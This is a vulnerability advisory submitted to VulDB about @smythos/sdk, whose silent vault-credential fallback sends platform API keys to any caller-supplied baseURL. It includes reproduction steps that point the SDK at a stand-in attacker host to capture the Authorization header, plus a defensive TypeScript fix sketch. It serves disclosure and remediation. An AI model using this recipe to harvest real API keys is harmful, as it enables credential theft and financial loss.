Submit #797642: smythos sdk <= 0.0.15 Credential Exposure / Information Disclosure (CWE-200)

Title: smythos sdk <= 0.0.15 Credential Exposure / Information Disclosure (CWE-200)
Description:

# Technical Details

An insecure credential fallback mechanism in the `@smythos/sdk` allows an internal or external attacker to stealthily steal highly sensitive system Vault API keys. If the SDK is initialized with an attacker-controlled `baseURL` and no credentials are explicitly provided, the framework automatically attaches the system's global Vault token (e.g., OpenAI or Anthropic keys) and sends it directly to the attacker's server.

# Vulnerable Code

File: packages/sdk/src/LLM/utils.ts

Method: adaptModelParams

Why: If the user omits the `credentials` or `apiKey` parameter, the function executes a "silent fallback" by aggressively setting the credentials array to `['vault']`. When `['vault']` is requested by the connector service upon request execution, the SRE environment (`ConnectorService.getVaultConnector()`) resolves it against the system-level `JSONFileVault` (typically loaded from `~/.smyth/vault.json`). This extraction completely bypasses any user origin or destination trust checks.

# Reproduction

1. Start an attacker server using express.js to intercept the API Key and log the `Authorization` header.
2. Initialize SRE Environment (`SRE.init()`) in a Node application that has access to the global vault configuration.
3. The attacker creates an LLM model pointing to their own server by supplying an external target via `baseURL: "http://attacker-controlled.com/v1"` without specifying an `apiKey`.
4. Trigger the LLM prompt. The SDK automatically attaches the Platform Vault Key and sends it to the attacker's server.

# Impact

- Critical exposure of Sensitive Information (Vault API Keys) to an Unauthorized Actor.
- Any multi-tenant platform integrating `@smythos/sdk` (where tenants can define a custom `baseURL`) is susceptible to comprehensive API key theft.
- Leads to severe financial loss due to unauthorized global LLM usage and provides a pivot for deeper organizational compromise.

Source: ⚠️ https://gist.github.com/YLChen-007/3d35e0ce8197989ee4de4a93def30d47
User: Eric-b (UID 96354)
Submission: 06/04/2026 05h49 (21 days ago)
Moderation: 25/04/2026 15h52 (19 days later)
Status: Accepted
VulDB entry: 359600 [SmythOS sre up to 0.0.15 Connector Service utils.ts baseURL Information Disclosure]
Points: 20
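
The missing destination trust check named in the description can be sketched as follows. This is an added example, not code from `@smythos/sdk` or from the submitter: every function and type name, the per-provider host allowlist, and the https-only policy are assumptions made for illustration.

```typescript
// Added illustration: every name here is hypothetical, not the @smythos/sdk API.
type ModelParams = { provider: string; baseURL?: string; apiKey?: string; credentials?: string[] };
type CredentialSource = "explicit" | "vault";

// Assumed policy: the only hosts allowed to receive a platform vault key, per provider.
const TRUSTED_HOSTS: Record<string, string[]> = {
  openai: ["api.openai.com"],
  anthropic: ["api.anthropic.com"],
};

// Behaviour the report describes: with no apiKey/credentials the vault is used,
// and baseURL is never consulted.
function fallbackAsReported(p: ModelParams): CredentialSource {
  const creds = p.credentials ?? [];
  return p.apiKey || creds.length > 0 ? "explicit" : "vault";
}

function parseUrl(raw: string): URL | null {
  try {
    return new URL(raw);
  } catch {
    return null;
  }
}

// A destination may receive vault credentials only if it is the provider default
// (no baseURL) or an https URL whose exact hostname is on the allowlist.
function isTrustedDestination(provider: string, baseURL?: string): boolean {
  if (baseURL === undefined) return true;
  const url = parseUrl(baseURL);
  if (!url || url.protocol !== "https:") return false;
  if (url.username || url.password) return false; // rejects https://trusted@other-host/
  return (TRUSTED_HOSTS[provider] ?? []).indexOf(url.hostname) !== -1;
}

// Hardened resolution: a vault lookup (implicit, or requested as 'vault') is refused
// unless the destination is trusted; caller-supplied keys may go to any baseURL.
function resolveCredentialSource(p: ModelParams): CredentialSource {
  const creds = p.credentials ?? [];
  const usesVault = !p.apiKey && (creds.length === 0 || creds.indexOf("vault") !== -1);
  if (!usesVault) return "explicit";
  if (!isTrustedDestination(p.provider, p.baseURL)) {
    throw new Error(`vault credentials refused for untrusted baseURL: ${p.baseURL}`);
  }
  return "vault";
}
```

Failing closed with an error, rather than sending the request unauthenticated, makes a misconfigured or tenant-supplied `baseURL` visible in logs instead of silently changing behaviour.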
